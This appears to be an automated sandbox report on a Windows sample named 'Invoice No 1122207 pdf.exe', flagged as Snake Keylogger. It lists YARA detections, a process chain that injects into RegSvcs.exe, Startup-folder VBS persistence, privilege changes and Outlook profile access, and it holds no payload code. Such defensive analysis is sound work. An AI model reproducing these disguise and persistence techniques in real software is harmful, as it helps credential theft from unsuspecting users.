Source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.ageless.exe.1580000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.1413396294.0000000001600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.1287788787.0000000001580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000008.00000002.2524453250.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ageless.exe PID: 7660, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7800, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ageless.exe PID: 8028, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_004837B5 GetLastError,FormatMessageW,

0_2_004837B5

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004710BF AdjustTokenPrivileges,CloseHandle,	0_2_004710BF
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_004716C3
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B510BF AdjustTokenPrivileges,CloseHandle,	7_2_00B510BF
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	7_2_00B516C3

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_004851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_004851CD

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0049A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0049A67C

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_0048648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0048648E

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_004142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_004142A2

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

File created: C:\Users\user\AppData\Local\supergroup

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

File created: C:\Users\user\AppData\Local\Temp\unfatiguing

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"

Source: Invoice No 1122207 pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Invoice No 1122207 pdf.exe	Virustotal: Detection: 33%
Source: Invoice No 1122207 pdf.exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

File read: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Process created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Process created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Invoice No 1122207 pdf.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\supergroup\ageless.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\supergroup\ageless.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Automated click: OK
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Invoice No 1122207 pdf.exe

Static file information: File size 1586176 > 1048576

Source: Invoice No 1122207 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Invoice No 1122207 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Invoice No 1122207 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Invoice No 1122207 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Invoice No 1122207 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Invoice No 1122207 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Invoice No 1122207 pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mscorlib.pdb source: RegSvcs.exe, 0000000B.00000002.2535081086.00000000059FB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: ageless.exe, 00000007.00000003.1285842372.0000000004410000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000007.00000003.1284739949.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 0000000A.00000003.1403860642.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 0000000A.00000003.1403549159.0000000004680000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ageless.exe, 00000007.00000003.1285842372.0000000004410000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 00000007.00000003.1284739949.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 0000000A.00000003.1403860642.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, ageless.exe, 0000000A.00000003.1403549159.0000000004680000.00000004.00001000.00020000.00000000.sdmp

Source: Invoice No 1122207 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Invoice No 1122207 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Invoice No 1122207 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Invoice No 1122207 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Invoice No 1122207 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

Code function: 0_2_004142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004142DE

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_00430A76 push ecx; ret		0_2_00430A89
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B10A76 push ecx; ret		7_2_00B10A89

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe

File created: C:\Users\user\AppData\Local\supergroup\ageless.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\supergroup\ageless.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_0042F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0042F98E
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Code function: 0_2_004A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_004A1C41
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	7_2_00B0F98E
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Code function: 7_2_00B81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	7_2_00B81C41

Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice No 1122207 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\supergroup\ageless.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
